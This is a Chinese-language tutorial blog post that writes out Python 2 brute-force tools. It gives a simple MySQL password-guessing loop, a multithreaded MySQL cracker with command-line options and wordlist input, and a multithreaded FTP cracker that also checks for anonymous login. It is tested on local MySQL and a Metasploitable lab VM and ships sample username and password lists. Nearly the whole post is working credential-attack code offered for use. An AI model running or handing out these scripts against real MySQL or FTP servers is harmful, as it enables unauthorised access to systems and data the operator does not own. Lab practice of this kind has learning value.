上一篇讲到了如何用Python开发字典,而当我们手里有了字典
就可以进一步去做爆破的任务了,可以用现成的工具,当然也可以自己写
接下来我就要一步一步来写爆破工具!
爆破MySQL:
想要爆破MySQL目标至少要允许远程连接
我这里没有开启远程连接,只是爆破本地的MySQL
实际上,如果掌握了如何爆破本地MySQL,那么想要远程爆破MySQL也是很轻松的
最基本的实现:
# -*-coding:utf-8 -*-
import pymysql

# Minimal credential-guessing loop (Python 2 syntax: print statement,
# `except Exception, e`). Every pair from the two tuples below is tried
# against one MySQL server; nothing is read from the command line.
mysql_username = ('root', 'test', 'admin', 'user')
mysql_password = ('', '123456', 'test', 'root', 'admin', 'xuyiqing', 'user')
success = False
# Target is the local instance; the surrounding text says remote access is
# not enabled for this test. `port` is assigned here but never passed to
# pymysql.connect below, so the client library's default is what is used.
host = "127.0.0.1"
port = 3306
for username in mysql_username:
    for password in mysql_password:
        try:
            # One fresh connection attempt per pair. On the server side each
            # of these is a separate authentication event, so even this short
            # loop shows up as a burst of failed logins for a handful of
            # accounts from a single client -- exactly the pattern failed-login
            # rate alerting and connection throttling are meant to catch.
            db = pymysql.connect(host, username, password)
            success = True
            if success:
                print "用户名:" + username + " 密码:" + password + " 破解成功"
            # NOTE: the loop keeps going after a hit and `db` is never closed.
        except Exception, e:
            # Any connection or authentication error lands here; `e` is unused.
            print "用户名:" + username + " 密码:" + password + " 破解失败"
            pass
固定好哪些用户名和哪些密码,以及爆破的IP和端口,直接执行即可
进阶的MySQL爆破脚本:写的很完整,支持多线程
# -*-coding:utf-8 -*-
"""
MySQL brute-force script
Usage: python MysqlCrack2.py -H [target IP] --u [user dictionary] --p [password dictionary] -P [port]
"""
import re
import socket
import optparse
import threading

# pymysql is the only non-stdlib dependency; abort with an install hint if
# it is missing rather than failing later inside a worker thread.
try:
    import pymysql
except ImportError:
    print "[!] You need to install pymysql module!"
    print "[!] Usage:pip install pymysql"
    exit()

# Module-level state shared with the worker threads:
#   result_user / result_pass -- the credential pair recorded by a successful
#                                mysql_login (overwritten by any later success)
#   threads                   -- every Thread started by mysql_brute, joined
#                                in the __main__ block before reporting
result_user = None
result_pass = None
threads = []


def main():
    """Parse the command-line options and start the run.

    Options: -H target host (must look like a dotted IPv4 address),
    --u user dictionary path, --p password dictionary path, -P port.
    :return: None
    """
    print "Welcome to MysqlCrack2"
    print "Author: Xuyiqing Version:1.0"
    parse = optparse.OptionParser('python %prog -H <target host> --u <users dictionary> --p <password dictionary> -P <port>')
    parse.add_option('-H', dest="target_host", type="string", help='specify the host')
    parse.add_option('--u', dest='user_dic', type='string', help='specify the dictionary for user')
    parse.add_option('--p', dest='pwd_dic', type='string', help='specify the dictionary for passwords')
    parse.add_option('-P', dest='port', type='int', help='specify the port')
    (options, args) = parse.parse_args()
    target_host = options.target_host
    user_dic = options.user_dic
    pwd_dic = options.pwd_dic
    port = options.port
    # re.match anchors at the start only: it accepts anything that begins
    # with four dot-separated digit groups and does not check octet ranges.
    if target_host is not None and re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', target_host):
        mysql_brute(target_host, user_dic, pwd_dic, port)
    else:
        print "[!] Unknown IP\n"
        exit()


def mysql_brute(host, user_dic, pwd_dic, port):
    """Load both dictionaries and start one mysql_login thread per pair.

    :param host: target host
    :param user_dic: path of the username dictionary (one entry per line)
    :param pwd_dic: path of the password dictionary (one entry per line)
    :param port: MySQL port
    :return: None
    """
    print "[*] Target:" + host
    print "[*] Start cracking"
    userlist = None
    pwdlist = None
    # Name resolution only -- no socket is opened here, so this does not
    # actually prove the port is reachable despite the message below.
    try:
        socket.gethostbyname(host)
    except Exception:
        print '[*] Cannot connect to %s' % host
        exit()
    # Trailing newlines are stripped; other whitespace is kept as part of
    # the entry. The file handles from open() are never closed.
    try:
        userlist = [i.strip('\n') for i in open(user_dic, 'r').readlines()]
        pwdlist = [j.strip('\n') for j in open(pwd_dic, 'r').readlines()]
        print "[*] Number of users:" + str(len(userlist))
        print "[*] Number of passwords:" + str(len(pwdlist))
    except Exception:
        print "[!] The path of the dictionary file is incorrect"
        exit()
    global threads
    # No thread pool or limit: len(userlist) * len(pwdlist) threads are
    # started at once, each opening its own connection. From the server's
    # point of view that is a burst of simultaneous authentication failures
    # from one source address -- the signature that failed-login rate
    # alerting and server-side connection-control / throttling are built
    # to detect and slow down.
    for user in userlist:
        for pwd in pwdlist:
            t = threading.Thread(target=mysql_login, args=(host, user, pwd, port))
            t.start()
            threads.append(t)


def mysql_login(host, username, password, port):
    """Attempt one MySQL connection; record the pair on success.

    Runs in a worker thread. Success prints the pair and stores it in the
    module-level result_user / result_pass; failure only prints.
    :param host: target host
    :param username: username to try
    :param password: password to try
    :param port: MySQL port
    :return: None
    """
    try:
        db = pymysql.Connect(host=host, port=port, user=username, passwd=password)
        print "[+] Success! User:" + username + " Password:" + password + "\n"
        global result_user, result_pass
        result_user = username
        result_pass = password
        db.close()
        # exit() raises SystemExit, which is not an Exception subclass, so the
        # handler below does not swallow it; inside a worker thread it ends
        # only this thread, not the interpreter.
        exit()
    except Exception:
        print "[-] Fail! User:" + username + " Password:" + password + "\n"


if __name__ == '__main__':
    main()
    # Wait for every worker, then report whichever successful pair was
    # recorded last (or the failure message if none succeeded).
    for thread in threads:
        thread.join()
    if result_user is not None and result_pass is not None:
        print "[+] Result: %s - %s" % (result_user, result_pass)
    if result_user is None and result_pass is None:
        print "[+] Crack Fail"
FTP破解工具开发:
实际去安装一些FTP软件比较困难,我这里就用Metasploitable Linux
启动后默认开启FTP服务,我这里的IP是192.168.232.129
Metasploitable Linux的FTP可以匿名登陆,并且已知一个账号密码为:msfadmin-msfadmin
# -*-coding:utf-8 -*-
import optparse
import ftplib
import threading
import socket


def anony_login(host):
    """Check whether the FTP server accepts an anonymous login.

    Logs in as 'anonymous' (the password is just a conventional e-mail
    string), lists the current directory and disconnects. Any error is
    reported as a failed anonymous login.
    :param host: target host
    :return: None
    """
    try:
        # ftplib.FTP(host) already connects when given a host; the explicit
        # connect() below opens a second connection to port 21 with a 10 s
        # timeout, and that is the one used from here on.
        ftp = ftplib.FTP(host)
        ftp.connect(host, 21, timeout=10)
        ftp.login('anonymous', 'test@qq.com')
        ftp.retrlines('LIST')
        ftp.quit()
        print "\n[*]" + str(host) + " FTP Anonymous Login Success"
    except Exception:
        print "\n[-]" + str(host) + " FTP Anonymous Login Fail"


def ftp_login(host, username, password):
    """Try one username/password pair against the FTP server.

    Runs in a worker thread. Prints the pair before trying it and a
    "Success!" line if login and LIST both succeed; failures are silent.
    :param host: target host
    :param username: username to try
    :param password: password to try
    :return: None
    """
    try:
        print "[-] Trying: " + username + "-" + password + "\n"
        ftp = ftplib.FTP(host)
        ftp.connect(host, 21, timeout=10)
        ftp.login(username, password)
        ftp.retrlines("LIST")
        ftp.quit()
        print "Success! " + username + " - " + password
    except ftplib.all_errors:
        # ftplib's error tuple (its own error classes plus the I/O errors it
        # re-exports); a rejected login ends up here without any output.
        pass


def brute_force(host, users_file, pwds_file):
    """Start one ftp_login thread for every (user, password) pair.

    :param host: target host
    :param users_file: path of the username dictionary (one entry per line)
    :param pwds_file: path of the password dictionary (one entry per line)
    :return: None
    """
    # Both files stay open for the whole run and are never closed; the
    # password file is rewound with seek(0) for each user.
    users_f = open(users_file, 'r')
    pwds_f = open(pwds_file, 'r')
    for user in users_f.readlines():
        pwds_f.seek(0)
        for password in pwds_f.readlines():
            username = user.strip('\n')
            password = password.strip('\n')
            # Unbounded fan-out: one non-daemon thread per pair, never joined,
            # so brute_force() returns while attempts are still in flight and
            # the process only exits once they all finish. Each attempt is a
            # separate failed FTP login on the server, which is why a run
            # like this stands out in the server's authentication log as a
            # burst of failures from one client.
            t = threading.Thread(target=ftp_login, args=(host, username, password))
            t.start()


def main():
    """Parse the command-line options, then run the anonymous check and the dictionary run.

    Options: -H target host, -u user dictionary path, -p password dictionary path.
    :return: None
    """
    parser = optparse.OptionParser('usage%prog -H <target host> -u <users dictionary> -p <password dictionary>')
    parser.add_option('-H', dest='target_host', type='string', help='specify the host')
    parser.add_option('-u', dest='user_dic', type='string', help='specify the dictionary for user')
    parser.add_option('-p', dest='pwd_dic', type='string', help='specify the dictionary for passwords')
    (options, args) = parser.parse_args()
    host = options.target_host
    user_dic = options.user_dic
    pwd_dic = options.pwd_dic
    # Name resolution only; no connection is made here.
    try:
        socket.gethostbyname(host)
    except Exception:
        print '[*] Cannot Resolve %s Unknown host' % host
        exit()
    anony_login(host)
    brute_force(host, user_dic, pwd_dic)


if __name__ == '__main__':
    main()
使用的话,需要两个字典:用户字典和密码字典,我随便加入一些东西
username.txt
root
user
admin
msfadmin
manager
password.txt
pwd
password
userpass
msfadmin
manager
123456
实际使用:-H 输入IP -u 用户名字典 -p 密码字典
结果:上边已经找到匿名登陆,还有下图的msfadmin,说明破解成功了